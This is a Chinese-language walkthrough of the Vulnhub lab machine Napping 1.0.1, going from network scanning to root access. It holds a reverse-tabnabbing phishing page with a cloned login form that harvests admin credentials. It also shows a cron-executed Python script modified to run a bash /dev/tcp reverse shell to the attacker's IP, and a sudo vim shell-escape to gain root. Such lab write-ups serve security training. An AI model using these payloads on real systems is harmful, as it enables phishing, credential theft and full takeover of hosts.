Vulnhub靶场--NAPPING: 1.0.1
环境配置
靶机链接
攻击者主机IP:192.168.47.145
目标主机IP:192.168.47.13
信息搜集
扫描目标主机,发现目标主机开放了22
和80
端口
┌──(kali㉿kali)-[~] └─$ sudo nmap -sV -sT -A -p- 172.18.53.13 [sudo] password for kali: Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-09 08:48 EST Nmap scan report for 172.18.53.1 Host is up (0.00068s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 24:c4:fc:dc:4b:f4:31:a0:ad:0d:20:61:fd:ca:ab:79 (RSA) | 256 6f:31:b3:e7:7b:aa:22:a2:a7:80:ef:6d:d2:87:6c:be (ECDSA) |_ 256 af:01:85:cf:dd:43:e9:8d:32:50:83:b2:41:ec:1d:3b (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Login | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.41 (Ubuntu) MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.68 ms 172.18.53.1 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.27 seconds
Web漏洞挖掘
访问目标主机的80端口,发现是一个登录注册页面
此处考虑sql注入,万能密码,弱口令,未成功
接着考虑爆破目录,看看是否存在其他的路径
┌──(kali㉿kali)-[~] └─$ sudo gobuster dir -u http://172.18.53.13/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak -t 50 =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://172.18.53.1/ [+] Method: GET [+] Threads: 50 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: zip,php,html,js,txt.bak,git,git.bak,txt,php.bak,html.bak,json,zip.bak [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.php (Status: 403) [Size: 276] /.html.bak (Status: 403) [Size: 276] /.html (Status: 403) [Size: 276] /register.php (Status: 200) [Size: 1566] /index.php (Status: 200) [Size: 1219] /welcome.php (Status: 302) [Size: 0] [--> index.php] /logout.php (Status: 302) [Size: 0] [--> index.php] /config.php (Status: 200) [Size: 0] /.html.bak (Status: 403) [Size: 276] /.php (Status: 403) [Size: 276] /.html (Status: 403) [Size: 276] /server-status (Status: 403) [Size: 276] Progress: 2867280 / 2867293 (100.00%) =============================================================== Finished ===============================================================
访问config.php
,发现是空白页,猜测可能需要传参,ffuf
之后没有成功
那么回到前面的页面,先注册一个账号再登录
登录之后,是一个博客推广网站,可以免费提交博客链接用于推广,所有链接都会被管理员用户审查。
在我们提交链接之后,可以通过点击Here
查看我们提交的链接。
搜索查看wp之后,发现这里存在Tabnabbing漏洞。
通过F12修改Here对应的链接,看看是否可以i跳转。如果输入什么网站,就跳转到什么网站,那么会存在Tabnabbing漏洞。
Tabnabbing攻击: 使用正常网站A的a标签设置为恶意网站B,恶意网站B中利用window.opener修改原先页面A页面,进而无征兆把访问正常网站A页面修改为钓鱼网站C页面。 两个可以利用点: 1、使用a标签,并且target=_blank,没有使用rel="noopener/noreferrer"属性 2、使用window.open
点击之后,确实发生了跳转
接着,我们创建两个页面,一个是恶意的页面B,另一个是伪造的登录页面C
恶意页面B.html
:
<!DOCTYPE html> <html> <body> <script> if(window.opener) mainframe.location.replace=('http://172.18.53.145:8888/C.html'); if(window.opener != window) mainframe.location.replace=('http://172.18.53.145:8888/C.html'); </script> </body> </html>
代码解释:
代码解释: 1. window.opener 属性表示打开当前窗口的窗口对象,如果当前窗口不是由另一个窗口打开的,则它的值为null。 2. if(window.opener) 这行代码检查window.opener是否存在,如果存在,表示当前窗口是被另一个窗口打开的,即在iframe中。 3. mainframe 表示主窗口,也就是打开当前窗口的窗口。 4. location.replace 能将主窗口的地址栏改变到一个新的地址,相当于重定向主窗口。 5. 将主窗口的location改成'http://172.18.53.145:8888/login.html',意味着重定向主窗口到这个新的登录页面。
伪造的登陆页面C.html
,这里直接拷贝了正常登录页面的源码:
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Login</title> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"> <style> body{ font: 14px sans-serif; } .wrapper{ width: 360px; padding: 20px; } </style> </head> <body> <div class="wrapper"> <h2>Login</h2> <p>Please fill in your credentials to login.</p> <form action="/index.php" method="post"> <div class="form-group"> <label>Username</label> <input type="text" name="username" class="form-control " value=""> <span class="invalid-feedback"></span> </div> <div class="form-group"> <label>Password</label> <input type="password" name="password" class="form-control "> <span class="invalid-feedback"></span> </div> <div class="form-group"> <input type="submit" class="btn btn-primary" value="Login"> </div> <p>Don't have an account? <a href="register.php">Sign up now</a>.</p> </form> </div> </body> </html>
在攻击者机器上使用python起一个http服务,并监听本地8888端口
┌──(kali㉿kali)-[~/tools/download] └─$ python -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
┌──(kali㉿kali)-[~] └─$ nc -lvp 8888 listening on [any] 8888 ...
然后将B页面当作需要推广的博客链接提交,这样就相当于将恶意链接嵌入了正常的页面,当管理员用户点击该链接进行审查时,原页面就会跳转到我们伪造的登录页面,当管理员用户登录时,攻击者就可以拿到管理员用户的账号密码。
┌──(kali㉿kali)-[~] └─$ nc -lvp 8888 listening on [any] 8888 ... 172.18.53.13: inverse host lookup failed: Unknown host connect to [172.18.53.145] from (UNKNOWN) [172.18.53.13] 49584 POST /login.html HTTP/1.1 Host: 172.18.53.145:8888 User-Agent: python-requests/2.22.0 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Content-Length: 45 Content-Type: application/x-www-form-urlencoded username=daniel&password=C%40ughtm3napping123
这样我们就拿到了账号:daniel
,密码:C@ughtm3napping123
,想到端口扫描时,目标主机还开放了22
端口,那么就使用这个账号密码进行SSH登录。
┌──(kali㉿kali)-[~] └─$ ssh daniel@172.18.53.13 The authenticity of host '172.18.53.13 (172.18.53.13)' can't be established. ED25519 key fingerprint is SHA256:81h22zyEZ6ztpKfLu65kzPnsnUUotkuioRYPno8fpN8. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '172.18.53.13' (ED25519) to the list of known hosts. daniel@172.18.53.13's password: Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-89-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Fri Nov 10 06:49:58 UTC 2023 System load: 0.02 Usage of /: 44.0% of 18.57GB Memory usage: 10% Swap usage: 0% Processes: 149 Users logged in: 0 IPv4 address for enp0s3: 172.18.53.13 IPv6 address for enp0s3: 2001:250:6406:2053:a00:27ff:fe49:ee4d * Super-optimized for small spaces - read how we shrank the memory footprint of MicroK8s to make it the smallest full K8s around. https://ubuntu.com/blog/microk8s-memory-optimisation 33 updates can be applied immediately. To see these additional updates run: apt list --upgradable The list of available updates is more than a week old. To check for new updates run: sudo apt update Last login: Tue Oct 12 00:51:35 2021 from 10.0.2.15 daniel@napping:~$
提权
登录之后收集目标主机的基本信息
(1)有当前用户的密码,可以先查看一下当前用户的权限,发现当前用户没有权限
daniel@napping:~$ sudo -l [sudo] password for daniel: Sorry, user daniel may not run sudo on napping.
2)看看有没有可疑的用户或者用户组
查看当前用户及其所属组,发现当前用户有一个所在组administrators
daniel@napping:~$ id uid=1001(daniel) gid=1001(daniel) groups=1001(daniel),1002(administrators)
查看/etc/passwd
文件,看看有没有特殊的用户,发现adrian
用户和daniel
用户,通过ls /home
也可以查看
daniel@napping:~$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin adrian:x:1000:1000:adrian:/home/adrian:/bin/bash lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false sshd:x:112:65534::/run/sshd:/usr/sbin/nologin mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false daniel:x:1001:1001::/home/daniel:/bin/bash
(3)查看内核版本以及网络情况
daniel@napping:~$ uname -a Linux napping 5.4.0-89-generic #100-Ubuntu SMP Fri Sep 24 14:50:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux daniel@napping:~$ ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether 08:00:27:49:ee:4d brd ff:ff:ff:ff:ff:ff inet 172.18.53.13/24 brd 172.18.53.255 scope global dynamic enp0s3 valid_lft 4184sec preferred_lft 4184sec inet6 2001:250:6406:2053:a00:27ff:fe49:ee4d/64 scope global dynamic mngtmpaddr noprefixroute valid_lft 2591998sec preferred_lft 604798sec inet6 fe80::a00:27ff:fe49:ee4d/64 scope link valid_lft forever preferred_lft forever
(4)查看看网站根目录是否存在数据库账号密码等敏感信息
在config.php页面中发现一个数据库的账号密码
daniel@napping:~$ cd /var/www/html/ daniel@napping:/var/www/html$ ls -liah total 44K 792043 drwxr-xr-x 2 root root 4.0K Oct 12 2021 . 792042 drwxr-xr-x 3 root root 4.0K Oct 11 2021 .. 792826 -rw-r--r-- 1 root root 486 Oct 11 2021 config.php 792827 -rw-r--r-- 1 root root 4.7K Oct 11 2021 index.php 792828 -rw-r--r-- 1 root root 223 Oct 11 2021 logout.php 792830 -rw-r--r-- 1 root root 5.2K Oct 11 2021 register.php 792829 -rw-r--r-- 1 root root 3.9K Oct 11 2021 reset-password.php 794398 -rw-r--r-- 1 root root 6.8K Oct 12 2021 welcome.php daniel@napping:/var/www/html$ cat config.php <?php /* Database credentials. Assuming you are running MySQL server with default setting (user 'root' with no password) */ define('DB_SERVER', 'localhost'); define('DB_USERNAME', 'adrian'); define('DB_PASSWORD', 'P@sswr0d456'); define('DB_NAME', 'website'); /* Attempt to connect to MySQL database */ $mysqli = new mysqli(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME); // Check connection if($mysqli === false){ die("ERROR: Could not connect. " . $mysqli->connect_error); } ?>
(5)查看用户家目录下有没有可疑的文件
daniel@napping:~$ ls /home/ adrian daniel daniel@napping:~$ ls -liah /home/adrian/ total 32K 791504 drwxr-xr-x 3 adrian adrian 4.0K Nov 9 13:48 . 262145 drwxr-xr-x 4 root root 4.0K Oct 12 2021 .. 794373 lrwxrwxrwx 1 adrian adrian 9 Oct 12 2021 .bash_history -> /dev/null 791506 -rw-r--r-- 1 adrian adrian 0 Feb 25 2020 .bash_logout 791507 -rw-r--r-- 1 adrian adrian 0 Feb 25 2020 .bashrc 791524 drwx------ 2 adrian adrian 4.0K Oct 11 2021 .cache 794363 lrwxrwxrwx 1 adrian adrian 9 Oct 12 2021 .mysql_history -> /dev/null 791505 -rw-r--r-- 1 adrian adrian 0 Feb 25 2020 .profile 794359 -rw-rw-r-- 1 adrian adrian 75 Oct 11 2021 .selected_editor 791526 -rw-r--r-- 1 adrian adrian 0 Oct 11 2021 .sudo_as_admin_successful 792736 -rw------- 1 adrian adrian 0 Oct 30 2021 .viminfo 792740 -rw-rw-r-- 1 adrian administrators 481 Oct 30 2021 query.py 792383 -rw-rw-r-- 1 adrian adrian 5.9K Nov 10 07:08 site_status.txt 794392 -rw------- 1 adrian adrian 22 Oct 12 2021 user.txt daniel@napping:~$ ls -liah /home/daniel/ total 24K 792831 drwxr-xr-x 3 daniel daniel 4.0K Oct 12 2021 . 262145 drwxr-xr-x 4 root root 4.0K Oct 12 2021 .. 794391 lrwxrwxrwx 1 daniel daniel 9 Oct 12 2021 .bash_history -> /dev/null 794358 -rw-r--r-- 1 daniel daniel 220 Feb 25 2020 .bash_logout 794360 -rw-r--r-- 1 daniel daniel 3.7K Feb 25 2020 .bashrc 794361 drwx------ 2 daniel daniel 4.0K Oct 12 2021 .cache 794351 -rw-r--r-- 1 daniel daniel 807 Feb 25 2020 .profile 792825 -rw------- 1 daniel daniel 0 Oct 12 2021 .viminfo
daniel
用户的家目录下,没有什么可疑文件,
adrian
用户家目录下的query.py
文件,对于用户组administrators
有读写权限,当前登录的用户也在这个用户组,那么这个文件可以考虑利用。先查看这个文件的内容
daniel@napping:~$ cat /home/adrian/query.py from datetime import datetime import requests now = datetime.now() r = requests.get('http://127.0.0.1/') if r.status_code == 200: f = open("site_status.txt","a") dt_string = now.strftime("%d/%m/%Y %H:%M:%S") f.write("Site is Up: ") f.write(dt_string) f.write("\n") f.close() else: f = open("site_status.txt","a") dt_string = now.strftime("%d/%m/%Y %H:%M:%S") f.write("Check Out Site: ") f.write(dt_string) f.write("\n") f.close()
该文件首先访问本机的网站,如果访问成功则向site_status.txt
文件写入Site is Up和检查时间,如果访问失败,写入CHeck Out Site和检查时间
查看site_status.txt
文件,发现该文件从网站运行开始,每两分钟记录一次网站的运行状态
daniel@napping:/home/adrian$ cat site_status.txt Site is Up: 09/11/2023 13:48:03 Site is Up: 09/11/2023 13:50:01 Site is Up: 09/11/2023 13:52:02 Site is Up: 09/11/2023 13:54:01 Site is Up: 09/11/2023 13:56:01 Site is Up: 09/11/2023 13:58:01 Site is Up: 09/11/2023 14:00:02 Site is Up: 09/11/2023 14:02:01 Site is Up: 09/11/2023 14:04:02 Site is Up: 09/11/2023 14:06:02 Site is Up: 09/11/2023 14:08:02 Site is Up: 09/11/2023 14:10:01 Site is Up: 09/11/2023 14:12:01 Site is Up: 09/11/2023 14:14:01 Site is Up: 09/11/2023 14:16:02
猜测有定时任务,每两分钟运行一次该脚本。
因为当前用户所在所在用户组有权限修改该脚本,所以考虑直接修改该脚本反弹shell,拿到adrian
用户权限。
在/tmp
目录下创建shell.sh
daniel@napping:/tmp$ cat shell.sh #! /bin/bash bash -c 'bash -i >& /dev/tcp/172.18.53.145/4444 0>&1'
修改query.py
文件
daniel@napping:/home/adrian$ cat query.py from datetime import datetime import requests import os os.system('/usr/bin/bash /tmp/shell.sh') now = datetime.now() r = requests.get('http://127.0.0.1/') if r.status_code == 200: f = open("site_status.txt","a") dt_string = now.strftime("%d/%m/%Y %H:%M:%S") f.write("Site is Up: ") f.write(dt_string) f.write("\n") f.close() else: f = open("site_status.txt","a") dt_string = now.strftime("%d/%m/%Y %H:%M:%S") f.write("Check Out Site: ") f.write(dt_string) f.write("\n") f.close()
等待两分钟,shell反弹成功
┌──(kali㉿kali)-[~/tools/download] └─$ nc -lvp 4444 listening on [any] 4444 ... 172.18.53.13: inverse host lookup failed: Unknown host connect to [172.18.53.145] from (UNKNOWN) [172.18.53.13] 35184 bash: cannot set terminal process group (3941): Inappropriate ioctl for device bash: no job control in this shell adrian@napping:~$
查看当前用户的权限,发现当前用户可以在不需要密码的情况下使用vim
adrian@napping:~$ sudo -l sudo -l Matching Defaults entries for adrian on napping: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User adrian may run the following commands on napping: (root) NOPASSWD: /usr/bin/vim
于是,利用vim
提权
sudo vim -c ':!/bin/sh'
提权成功
:!/bin/sh id uid=0(root) gid=0(root) groups=0(root)
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步